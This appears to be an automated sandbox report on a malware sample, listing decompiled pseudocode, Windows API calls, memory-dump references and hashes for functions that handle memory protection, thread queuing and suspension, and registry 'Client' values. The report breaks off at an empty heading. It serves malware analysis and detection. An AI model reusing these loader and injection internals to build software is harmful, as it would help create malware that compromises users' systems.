
Uniqueness Score: 100.00%

Function 00401765, Relevance: 7.5, APIs: 5, Instructions: 19
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {
				void* _t1;
				int _t4;
				void* _t6;
				int _t7;

				_t7 = 0;
				_t1 = HeapCreate(0, 0x400000, 0); // executed
				 *0x4040e0 = _t1;
				if(_t1 != 0) {
					 *0x4040f0 = GetModuleHandleA(0);
					GetCommandLineW(); // executed
					_t4 = E00401B85(_t6); // executed
					_t7 = _t4; // executed
					HeapDestroy( *0x4040e0); // executed
				}
				ExitProcess(_t7);
			}

0x00401766
0x0040176f
0x00401777
0x0040177c
0x00401785
0x0040178a
0x00401790
0x0040179b
0x0040179d
0x0040179d
0x004017a4

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 0040176F
GetModuleHandleA.KERNEL32(00000000), ref: 0040177F
GetCommandLineW.KERNEL32 ref: 0040178A

Part of subcall function 00401B85: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401BC8
Part of subcall function 00401B85: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401BE8
Part of subcall function 00401B85: CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?), ref: 00401C14
Part of subcall function 00401B85: QueueUserAPC.KERNELBASE(00401F72,00000000,?,?,00000000), ref: 00401C30
Part of subcall function 00401B85: GetLastError.KERNEL32(?,00000000), ref: 00401C40
Part of subcall function 00401B85: TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401C47
Part of subcall function 00401B85: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401C4E
Part of subcall function 00401B85: SetLastError.KERNEL32(?,?,00000000), ref: 00401C55
Part of subcall function 00401B85: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00401C62
Part of subcall function 00401B85: GetExitCodeThread.KERNELBASE(00000000,?,?,00000000), ref: 00401C74
Part of subcall function 00401B85: FindCloseChangeNotification.KERNELBASE(00000000,?,00000000), ref: 00401C7B
Part of subcall function 00401B85: GetLastError.KERNEL32 ref: 00401C8E

HeapDestroy.KERNELBASE ref: 0040179D
ExitProcess.KERNEL32 ref: 004017A4

Memory Dump Source

Source File: 00000005.00000002.924455277.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.924481544.0000000000407000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_CVPFktt.jbxd

Similarity

API ID: ErrorLastThread$CloseCreateExitHandleHeapLongNamePath$ChangeCodeCommandDestroyFindLineModuleNotificationObjectProcessQueueSingleTerminateUserWait
String ID:
API String ID: 231641090-0
Opcode ID: 287c529f918516198d1d683ec8fb087cd2e0f045d29fcaa844d052d229a39529
Instruction ID: 282977a4049ec322611ad4683e4e150b5b2d90abef42251df6d3ec477c7a1f1e
Opcode Fuzzy Hash: 287c529f918516198d1d683ec8fb087cd2e0f045d29fcaa844d052d229a39529
Instruction Fuzzy Hash: D5E0B675803120ABC721AF72BE0CA4A3EBCBF497927004136F602F2174DB784600CBAD

Uniqueness

Uniqueness Score: 0.36%

Function 001C5C90, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78registryUNIQUE

Download Yara Rule

APIs

Part of subcall function 001DF4F8: RegCreateKeyA.ADVAPI32(80000001,03E588A0,?), ref: 001DF50D
Part of subcall function 001DF4F8: lstrlen.KERNEL32(03E588A0,00000000,00000000,00000000,?,001DE01D,00000000,?), ref: 001DF53B

RegQueryValueExA.KERNELBASE(00000000,Client,00000000,001C2DF5,001E5068,001D0A48,00000001,00000000,03E58D64,001E506E,00000000,001C2DF5,03E58D64,774FC740,00000000,001D0A48), ref: 001C5CDB
RegSetValueExA.KERNELBASE(001E5068,Client,00000000,?,001E5068,00000028), ref: 001C5D18
RegCloseKey.KERNELBASE(?), ref: 001C5D24

Strings

Client, xrefs: 001C5CC2, 001C5CD4, 001C5D14, 001C5D43

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Value$CloseCreateQuerylstrlen
String ID: Client
API String ID: 2552977122-3236430179
Opcode ID: cbc1a75aa1b7a705434d8ccd5f51ce3b9ee719fb7c4479dc637f2f191340ae27
Instruction ID: 7f9e8d12e0be78f6f8e155cf09dbb0537b352d4d6d298cbaeacb0cf44fc33462
Opcode Fuzzy Hash: cbc1a75aa1b7a705434d8ccd5f51ce3b9ee719fb7c4479dc637f2f191340ae27
Instruction Fuzzy Hash: 94214471900A48EFDB50DBD5DC84FAE7BBAEB14758F50406AF505AA550D3B09EC4CBA0

Uniqueness

Uniqueness Score: 100.00%

Function 001C4F38, Relevance: 6.1, APIs: 4, Instructions: 110threadsynchronizationinjectionCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 001C4F66
ResumeThread.KERNELBASE(?,?,?,?,?,00000004,?), ref: 001C4FF0
WaitForSingleObject.KERNEL32(00000064,?,?,?,?,00000004,?), ref: 001C4FFE
SuspendThread.KERNELBASE(?,?,?,?,?,00000004,?), ref: 001C5011

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Thread$ObjectResumeSingleSuspendWaitmemset
String ID:
API String ID: 3168247402-0
Opcode ID: 0cfc476c3d79cf190b4b9dac838887d93d29d0b8004b5c0646305ed5120c4ddd
Instruction ID: 47c9ff178f8faa6cd3ab76f96fe1db596928721009ec2ba40ba9dcdefec92c40
Opcode Fuzzy Hash: 0cfc476c3d79cf190b4b9dac838887d93d29d0b8004b5c0646305ed5120c4ddd
Instruction Fuzzy Hash: 67417C71108301AFE721DF54CC81E6BBBEAEBA8354F04492DFA94C51A0D771E9A4CB62

Uniqueness

Uniqueness Score: 0.15%

Function 00401C93, Relevance: 6.1, APIs: 4, Instructions: 67
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401C93(void* __ebx, struct _CRITICAL_SECTION* _a4, unsigned int _a8, intOrPtr _a12) {
				int _t23;
				intOrPtr _t26;
				intOrPtr* _t28;
				unsigned int _t32;
				long _t33;
				intOrPtr* _t34;

				_t32 = _a8 >> 0xc;
				_t34 = E004018B8(0x18);
				if(_t34 == 0) {
					_t33 = 8;
					L11:
					return _t33;
				}
				 *(_t34 + 8) = _t32;
				 *((intOrPtr*)(_t34 + 0x10)) = _a12;
				 *((intOrPtr*)(_t34 + 0x14)) = 0;
				EnterCriticalSection(_a4);
				_t28 = E00401B64(_a4, _t32);
				if(_t28 == _a4 + 0x18 ||  *((intOrPtr*)(_t28 + 8)) != _t32) {
					_t10 = _t34 + 0xc; // 0xc
					_t23 = VirtualProtect(_a8, 1, 1, _t10); // executed
					if(_t23 == 0) {
						_t33 = GetLastError();
					} else {
						 *((intOrPtr*)(_t34 + 4)) = _t34;
						 *_t34 = _t34;
						_t26 =  *_t28;
						 *_t34 = _t26;
						 *((intOrPtr*)(_t34 + 4)) = _t28;
						 *((intOrPtr*)(_t26 + 4)) = _t34;
						 *_t28 = _t34;
						_t33 = 0;
					}
				} else {
					_t33 = 0xb7;
				}
				LeaveCriticalSection(_a4);
				if(_t33 != 0) {
					E004010A3(_t34);
					if(_t33 == 0xb7) {
						_t33 = 0;
					}
				}
				goto L11;
			}

0x00401c9d
0x00401ca5
0x00401ca9
0x00401d3e
0x00401d3f
0x00401d44
0x00401d44
0x00401cb6
0x00401cb9
0x00401cbc
0x00401cc3
0x00401cd2
0x00401cdc
0x00401cea
0x00401cf5
0x00401cfd
0x00401d1a
0x00401cff
0x00401cff
0x00401d02
0x00401d04
0x00401d06
0x00401d08
0x00401d0b
0x00401d0e
0x00401d10
0x00401d10
0x00401ce3
0x00401ce3
0x00401ce3
0x00401d1f
0x00401d28
0x00401d2b
0x00401d36
0x00401d38
0x00401d38
0x00401d36
0x00000000

APIs

Part of subcall function 004018B8: HeapAlloc.KERNEL32(00000000,?,004011B3,00000028,?,00400000,00401D89,?,00000000,?,?,?,00401BA3), ref: 004018C4

EnterCriticalSection.KERNEL32(00401BA3,00000000,00000018,?,00400000,?,00401745,?,?,00401BA3,00000000,00400000,00000000,?,?,00401DBC), ref: 00401CC3
VirtualProtect.KERNELBASE(?,00000001,00000001,0000000C,?,?,00401745,?,?,00401BA3,00000000,00400000,00000000,?,?,00401DBC), ref: 00401CF5
GetLastError.KERNEL32(?,00401745,?,?,00401BA3,00000000,00400000,00000000,?,?,00401DBC,?,?,00401BA3,?,00000000), ref: 00401D14
LeaveCriticalSection.KERNEL32(00401BA3,?,00401745,?,?,00401BA3,00000000,00400000,00000000,?,?,00401DBC,?,?,00401BA3), ref: 00401D1F

Memory Dump Source

Source File: 00000005.00000002.924455277.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.924481544.0000000000407000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_CVPFktt.jbxd

Similarity

API ID: CriticalSection$AllocEnterErrorHeapLastLeaveProtectVirtual
String ID:
API String ID: 1328245997-0
Opcode ID: c6e92eb0693e9e792ce88bbbbf24cc6a39f68a2452665537571e2c8c82695f5d
Instruction ID: abf8257b6cae66e091cd057c5a5708daac09fc27fcfa979b031c3913550497ce
Opcode Fuzzy Hash: c6e92eb0693e9e792ce88bbbbf24cc6a39f68a2452665537571e2c8c82695f5d
Instruction Fuzzy Hash: 7A218E32600604EBDB208F59C880B5A7BE9EF84750F14843BF548AB3A0C778E941CBA5

Uniqueness

Uniqueness Score: 2.12%

Function 001C7EDB, Relevance: 6.1, APIs: 4, Instructions: 64memoryregistryUNIQUE

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?), ref: 001C7F00
RtlAllocateHeap.NTDLL(00000000,?), ref: 001C7F17
HeapFree.KERNEL32(00000000,00000000), ref: 001C7F32
RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?), ref: 001C7F51

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: HeapQueryValue$AllocateFree
String ID:
API String ID: 4267586637-0
Opcode ID: d418a9f0e1069a34bac83132d430dd4e9f11dd7a8469eb6b538cc07bd98b16f2
Instruction ID: 4f60935e40912acde6a1bf03b30b76e89586a09ce69110499648850564e00ffb
Opcode Fuzzy Hash: d418a9f0e1069a34bac83132d430dd4e9f11dd7a8469eb6b538cc07bd98b16f2
Instruction Fuzzy Hash: 8D113AB6504118FFDB12DF85DCC4DEEBBBDEB99750B10405AF911A62A0D3B19E80DB60

Uniqueness

Uniqueness Score: 100.00%

Function 00401000, Relevance: 6.1, APIs: 4, Instructions: 63
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00401000(unsigned int __eax, void* __ecx, struct _CRITICAL_SECTION* _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _t24;
				int _t28;
				long _t29;
				void* _t31;
				signed int _t40;
				signed int _t42;
				void* _t45;

				_push(__ecx);
				_t31 = __eax;
				_v8 = 0x490;
				_t40 = __eax >> 0xc;
				EnterCriticalSection(_a4);
				_t45 = E00401B64(_a4, _t40);
				if(_t45 == _a4 + 0x18 ||  *((intOrPtr*)(_t45 + 8)) != _t40) {
					L10:
					LeaveCriticalSection(_a4);
					return _v8;
				} else {
					_t24 =  *((intOrPtr*)(_t45 + 0x14));
					if(_a8 == 0) {
						_t42 = _t40 | 0xffffffff;
						_t24 = _t24 - 1;
					} else {
						_t42 = 1;
					}
					_v8 = _v8 & 0x00000000;
					if(_t24 != 0) {
						L8:
						 *((intOrPtr*)(_t45 + 0x14)) =  *((intOrPtr*)(_t45 + 0x14)) + _t42;
						_t25 =  *(_t45 + 0x10);
						if( *(_t45 + 0x10) != 0) {
							E00401DFA(_t31 & 0xfffff000, _t31 & 0xfffff000, _t25);
							 *(_t45 + 0x10) =  *(_t45 + 0x10) & 0x00000000;
						}
						goto L10;
					} else {
						_t10 = _t45 + 0xc; // 0xc
						_t28 = VirtualProtect(_t31, 1,  *_t10, _t10); // executed
						if(_t28 != 0) {
							goto L8;
						}
						_t29 = GetLastError();
						_v8 = _t29;
						if(_t29 != 0) {
							goto L10;
						}
						goto L8;
					}
				}
			}

0x00401003
0x0040100a
0x0040100e
0x00401015
0x00401018
0x00401027
0x00401031
0x00401090
0x00401093
0x004010a0
0x00401038
0x0040103c
0x0040103f
0x00401046
0x00401049
0x00401041
0x00401043
0x00401043
0x0040104a
0x00401050
0x00401072
0x00401072
0x00401075
0x0040107a
0x00401087
0x0040108c
0x0040108c
0x00000000
0x00401052
0x00401052
0x0040105b
0x00401063
0x00000000
0x00000000
0x00401065
0x0040106d
0x00401070
0x00000000
0x00000000
0x00000000
0x00401070
0x00401050

APIs

EnterCriticalSection.KERNEL32(?,?,015485CC,015485A8,?,00000000,00401B32,015485A8,00000000), ref: 00401018
VirtualProtect.KERNELBASE(00000000,00000001,0000000C,0000000C,00000000,?,015485CC,015485A8,?,00000000,00401B32,015485A8,00000000), ref: 0040105B
GetLastError.KERNEL32(?,015485CC,015485A8,?,00000000,00401B32,015485A8,00000000), ref: 00401065
LeaveCriticalSection.KERNEL32(?,00000000,?,015485CC,015485A8,?,00000000,00401B32,015485A8,00000000), ref: 00401093

Memory Dump Source

Source File: 00000005.00000002.924455277.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.924481544.0000000000407000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_CVPFktt.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
String ID:
API String ID: 3666628472-0
Opcode ID: 4290bed91780be80b9d1480c38ae3b42766f7fb682c299189566e26dff4c8856
Instruction ID: c92b3a91690feabd93b7ffc908dde2cba3c0fd562173e722372c2a9bf1d520d8
Opcode Fuzzy Hash: 4290bed91780be80b9d1480c38ae3b42766f7fb682c299189566e26dff4c8856
Instruction Fuzzy Hash: C4117231600604ABDB20CF75DC44B6B7BE8AB443A5F108539E595E26A0E778D9448654

Uniqueness

Uniqueness Score: 2.12%

Function 001D7D1E, Relevance: 6.0, APIs: 4, Instructions: 37threadUNIQUE

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001D7D3D

Part of subcall function 001CCF9B: RtlEnterCriticalSection.NTDLL(00000000), ref: 001CCFA7
Part of subcall function 001CCF9B: CloseHandle.KERNEL32(?), ref: 001CCFB5
Part of subcall function 001CCF9B: RtlLeaveCriticalSection.NTDLL(00000000), ref: 001CCFD1

FindCloseChangeNotification.KERNELBASE(?), ref: 001D7D4B
InterlockedDecrement.KERNEL32(001E5FAC), ref: 001D7D5A

Part of subcall function 001D7DF8: SetEvent.KERNEL32(00000314,001D7D75), ref: 001D7E02
Part of subcall function 001D7DF8: FindCloseChangeNotification.KERNELBASE(00000314), ref: 001D7E17
Part of subcall function 001D7DF8: HeapDestroy.KERNELBASE(03A60000), ref: 001D7E27

RtlExitUserThread.NTDLL(00000000), ref: 001D7D76

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Close$ChangeCriticalFindNotificationSection$DecrementDestroyEnterEventExitHandleHeapInterlockedLeaveMultipleObjectsThreadUserWait
String ID:
API String ID: 1614632516-0
Opcode ID: d0b0baf6381f3e666671b727b95bc853d49581bea3c12caf11a971329d9283f0
Instruction ID: fec4c8b722899cc30d3ea3881faaa2a2ef6b9540f88f2ccb699418390f7f17e1
Opcode Fuzzy Hash: d0b0baf6381f3e666671b727b95bc853d49581bea3c12caf11a971329d9283f0
Instruction Fuzzy Hash: C5F02830140B94BFC7019BA88C45F6E7B3DEF45770B110219F525972D0EB708D41C761

Uniqueness

Uniqueness Score: 100.00%

Function 001D6093, Relevance: 5.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 001D60B9
memcpy.NTDLL ref: 001D60E1

Part of subcall function 001CFE1C: NtAllocateVirtualMemory.NTDLL(001DA726,00000000,00000000,001DA726,00003000,00000040), ref: 001CFE4D
Part of subcall function 001CFE1C: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CFE54
Part of subcall function 001CFE1C: SetLastError.KERNEL32(00000000), ref: 001CFE5B

GetLastError.KERNEL32(00000010,00000218,001E0F5D,00000100,?,00000318,00000008), ref: 001D60F8
GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E0F5D,00000100), ref: 001D61DB

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Error$Last$AllocateMemoryStatusVirtualmemcpymemset
String ID:
API String ID: 685050087-0
Opcode ID: fb7256d36aa3f0325ffab0c4136aa7984698d5cd1b03f860635054db50a7113e
Instruction ID: 66cc4f7cde3e90a55a69c79de73f28f9ca17a9825e3256414cfae0f663d719ca
Opcode Fuzzy Hash: fb7256d36aa3f0325ffab0c4136aa7984698d5cd1b03f860635054db50a7113e
Instruction Fuzzy Hash: 4841B5B1504301AFD720DF64CC82FABB7F9BB98310F00492EF999C6292E770D9148B62

Uniqueness

Uniqueness Score: 0.13%

Function 00401F72, Relevance: 4.6, APIs: 3, Instructions: 68
stringthreadUNIQUE

Download Yara Rule

C-Code - Quality: 92%

			E00401F72() {
				intOrPtr _v12;
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t17;
				void* _t18;
				signed int _t22;
				long _t27;
				void* _t29;
				int _t30;
				void* _t34;
				intOrPtr* _t36;
				signed int _t39;
				void* _t41;
				int _t48;

				_t17 =  *0x404104; // 0x0
				if( *0x4040ec > 5) {
					_t18 = _t17 + 0x4050f4;
				} else {
					_t18 = _t17 + 0x4050b1;
				}
				E004016D2(_t18, _t18);
				_push("true");
				_pop(_t39);
				memset( &_v32, 0, _t39 << 2);
				_t22 =  *0x404100; // 0xde9fbdeb
				if(E004013F9(0,  &_v32,  &_v16, _t22 ^ 0x408af7e7) == 0) {
					L10:
					_t27 = 0xb;
					goto L11;
				} else {
					_t42 = _v12;
					_t29 = E004016F8(_v28, 0, _v12, 0); // executed
					if(_t29 != 0) {
						goto L10;
					}
					_t30 = lstrlenW( *0x4040f8);
					_t10 = _t30 + 2; // 0x2
					_t48 = _t30 + _t10;
					_t13 = _t48 + 8; // 0xa
					_t34 = E004010D8(_t42, _t13,  &_v32,  &_v36); // executed
					if(_t34 == 0) {
						_t41 =  *0x4040f8; // 0x1548808
						_t36 = _v36;
						 *_t36 = 0;
						if(_t41 == 0) {
							 *(_t36 + 4) = 0;
						} else {
							memcpy(_t36 + 4, _t41, _t48);
						}
					}
					_t27 = E004017B2(_v28, _t42); // executed
					L11:
					ExitThread(_t27);
				}
			}

0x00401f78
0x00401f89
0x00401f93
0x00401f8b
0x00401f8b
0x00401f8b
0x00401f9a
0x00401f9f
0x00401fa3
0x00401fa8
0x00401faa
0x00401fc6
0x00402032
0x00402034
0x00000000
0x00401fc8
0x00401fc8
0x00401fd3
0x00401fda
0x00000000
0x00000000
0x00401fe2
0x00401fe8
0x00401fe8
0x00401ff6
0x00401ffa
0x00402001
0x00402003
0x0040200b
0x0040200f
0x00402011
0x00402023
0x00402013
0x00402019
0x0040201e
0x00402011
0x0040202b
0x00402035
0x00402036
0x00402036

APIs

lstrlenW.KERNEL32(00000000,?,?,DE9FBDEB,?), ref: 00401FE2
memcpy.NTDLL(?,01548808,00000002,0000000A,?,?), ref: 00402019
ExitThread.KERNEL32 ref: 00402036

Memory Dump Source

Source File: 00000005.00000002.924455277.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.924481544.0000000000407000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_CVPFktt.jbxd

Similarity

API ID: ExitThreadlstrlenmemcpy
String ID:
API String ID: 3726537860-0
Opcode ID: 1856cef2b63d54fa666631d987b7c7db997a1d230326136fb8b56090ab5ffe4e
Instruction ID: 19c037d32cf835204fde64e66e3029833d51ca04e430973a48b6ac893f634950
Opcode Fuzzy Hash: 1856cef2b63d54fa666631d987b7c7db997a1d230326136fb8b56090ab5ffe4e
Instruction Fuzzy Hash: 3B21CF710043419BE711DB61CD48D9BB7ECAF84308F01483BB650F72A1E778E949CB59

Uniqueness

Uniqueness Score: 100.00%

Function 001DF4F8, Relevance: 4.5, APIs: 3, Instructions: 39registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,03E588A0,?), ref: 001DF50D
RegOpenKeyA.ADVAPI32(80000001,03E588A0,?), ref: 001DF51A
lstrlen.KERNEL32(03E588A0,00000000,00000000,00000000,?,001DE01D,00000000,?), ref: 001DF53B

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: CreateOpenlstrlen
String ID:
API String ID: 2865187142-0
Opcode ID: 443fa4c994ef0c9b174cb1dab2eefcf8a649b0a02713672e86c635ea0ca764c0
Instruction ID: 558109ed0ac0578145e22865c42ac808ef78eea01b30e6c2cdf158c9c5ce88b7
Opcode Fuzzy Hash: 443fa4c994ef0c9b174cb1dab2eefcf8a649b0a02713672e86c635ea0ca764c0
Instruction Fuzzy Hash: B0F06D75000248BBEB119F94EC88EAE7BBCEB55364F10812AFD0696340D770EA80C7A1

Uniqueness

Uniqueness Score: 0.45%

Function 001D7DF8, Relevance: 4.5, APIs: 3, Instructions: 18memoryUNIQUE

Download Yara Rule

APIs

SetEvent.KERNEL32(00000314,001D7D75), ref: 001D7E02

Part of subcall function 001C7853: SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,001D7E0D), ref: 001C787C
Part of subcall function 001C7853: RtlDeleteCriticalSection.NTDLL(001E6320), ref: 001C78AF
Part of subcall function 001C7853: RtlDeleteCriticalSection.NTDLL(001E6340), ref: 001C78B6
Part of subcall function 001C7853: ReleaseMutex.KERNEL32(0000030C,00000000,?,?,?,001D7E0D), ref: 001C78DF
Part of subcall function 001C7853: FindCloseChangeNotification.KERNELBASE(?,?,001D7E0D), ref: 001C78EB
Part of subcall function 001C7853: ResetEvent.KERNEL32(00000000,00000000,?,?,?,001D7E0D), ref: 001C78F7
Part of subcall function 001C7853: CloseHandle.KERNEL32(?,?,001D7E0D), ref: 001C7903
Part of subcall function 001C7853: SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,001D7E0D), ref: 001C7909
Part of subcall function 001C7853: SleepEx.KERNELBASE(00000064,00000001,?,?,001D7E0D), ref: 001C791D
Part of subcall function 001C7853: HeapFree.KERNEL32(00000000,00000000,?,?,001D7E0D), ref: 001C7941
Part of subcall function 001C7853: RtlRemoveVectoredExceptionHandler.NTDLL(00AD9BE0), ref: 001C7977
Part of subcall function 001C7853: SleepEx.KERNELBASE(00000064,00000001,?,?,001D7E0D), ref: 001C7993

FindCloseChangeNotification.KERNELBASE(00000314), ref: 001D7E17
HeapDestroy.KERNELBASE(03A60000), ref: 001D7E27

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Sleep$Close$ChangeCriticalDeleteEventFindHeapNotificationSection$DestroyExceptionFreeHandleHandlerMutexReleaseRemoveResetVectored
String ID:
API String ID: 4280040283-0
Opcode ID: 80a7a9a3ad27442fec5feb8538680555d489ff139f5a7cc54b7eab08b70514e8
Instruction ID: ec5d1bbe2b30535f58fdfa764a973a8a169402fd4bc556be729b5d6749f55877
Opcode Fuzzy Hash: 80a7a9a3ad27442fec5feb8538680555d489ff139f5a7cc54b7eab08b70514e8
Instruction Fuzzy Hash: 2FE0E2B0A042819B9B50DFB0ACC8E0B33ADAB146513484858B909CEAE0EB70C8C4DA20

Uniqueness

Uniqueness Score: 100.00%

Function 001C878A, Relevance: 3.8, APIs: 3, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?), ref: 001C87DE
memcpy.NTDLL(?,?,?,?,?,?,?), ref: 001C8859
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?), ref: 001C8874

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFreememcpy
String ID:
API String ID: 4010158826-0
Opcode ID: 6aecdccd896c1add5544f09e280361ebeddacb8b7913eefc8bca374686ff467f
Instruction ID: 2f05398539435153e078bbc29688876d6087a98bf89ff6cecdf2bb72f3993310
Opcode Fuzzy Hash: 6aecdccd896c1add5544f09e280361ebeddacb8b7913eefc8bca374686ff467f
Instruction Fuzzy Hash: 5F317F72E0021AEBDB11DF98C8D1FEEB7B8BF54304F51416AE611AB281DB70DA058B90

Uniqueness

Uniqueness Score: 16.53%

Function 00401AC9, Relevance: 3.8, APIs: 3, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401AC9(intOrPtr* _a4) {
				intOrPtr _t8;
				void* _t11;
				void* _t14;
				intOrPtr _t17;
				intOrPtr* _t18;
				intOrPtr _t19;
				void* _t20;
				intOrPtr* _t22;
				long* _t24;
				signed int _t25;

				_t8 =  *0x404114; // 0x15485a8
				_t25 = 0;
				_t17 = _t8;
				if(_t8 != 0) {
					_t22 = _a4;
					_t18 =  *_t22;
					_t19 =  *_t18;
					if(_t19 != 0xc0000005) {
						if(_t19 == 0x80000004) {
							_t7 = _t8 + 0x24; // 0x15485cc
							_t24 = _t7;
							if(TlsGetValue( *_t24) != 0) {
								_t11 = E00401000(_t10, _t18, _t17, 0); // executed
								if(_t11 == 0) {
									TlsSetValue( *_t24, 0);
									goto L8;
								}
							}
						}
					} else {
						_t20 =  *(_t18 + 0x18);
						_t14 = E00401000(_t20, _t18, _t8, 1); // executed
						if(_t14 == 0) {
							TlsSetValue( *(_t17 + 0x24), _t20);
							 *( *((intOrPtr*)(_t22 + 4)) + 0xc0) =  *( *((intOrPtr*)(_t22 + 4)) + 0xc0) | 0x00000100;
							L8:
							_t25 = _t25 | 0xffffffff;
						}
					}
				}
				return _t25;
			}

0x00401ac9
0x00401ad0
0x00401ad5
0x00401ad7
0x00401ada
0x00401ade
0x00401ae0
0x00401ae8
0x00401b1a
0x00401b1c
0x00401b1c
0x00401b29
0x00401b2d
0x00401b34
0x00401b39
0x00000000
0x00401b39
0x00401b34
0x00401b29
0x00401aea
0x00401aea
0x00401af2
0x00401af9
0x00401aff
0x00401b08
0x00401b3f
0x00401b3f
0x00401b3f
0x00401af9
0x00401b42
0x00401b48

APIs

TlsSetValue.KERNEL32(?,?,015485A8,00000001), ref: 00401AFF
TlsGetValue.KERNEL32(015485CC), ref: 00401B21
TlsSetValue.KERNEL32(015485CC,00000000,015485A8,00000000), ref: 00401B39

Part of subcall function 00401000: EnterCriticalSection.KERNEL32(?,?,015485CC,015485A8,?,00000000,00401B32,015485A8,00000000), ref: 00401018
Part of subcall function 00401000: VirtualProtect.KERNELBASE(00000000,00000001,0000000C,0000000C,00000000,?,015485CC,015485A8,?,00000000,00401B32,015485A8,00000000), ref: 0040105B
Part of subcall function 00401000: GetLastError.KERNEL32(?,015485CC,015485A8,?,00000000,00401B32,015485A8,00000000), ref: 00401065
Part of subcall function 00401000: LeaveCriticalSection.KERNEL32(?,00000000,?,015485CC,015485A8,?,00000000,00401B32,015485A8,00000000), ref: 00401093

Memory Dump Source

Source File: 00000005.00000002.924455277.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.924481544.0000000000407000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_CVPFktt.jbxd

Similarity

API ID: Value$CriticalSection$EnterErrorLastLeaveProtectVirtual
String ID:
API String ID: 3047629960-0
Opcode ID: a7b9b4072b9c84b90a6a9c34f9358d1ac6add47c23cee939eb6c6058387d95d0
Instruction ID: dbcf3e8e38eb216d9deba61baf2f0e4e7ad3fcaeae7d555913bc0ad38df2122c
Opcode Fuzzy Hash: a7b9b4072b9c84b90a6a9c34f9358d1ac6add47c23cee939eb6c6058387d95d0
Instruction Fuzzy Hash: 2E019E313011049BE6108F14ED44E67BBF9AB95395F21817AF681E32B4E73AEC40D624

Uniqueness

Uniqueness Score: 1.47%

Function 001C719A, Relevance: 3.2, APIs: 2, Instructions: 168libraryloaderUNIQUE

Download Yara Rule

APIs

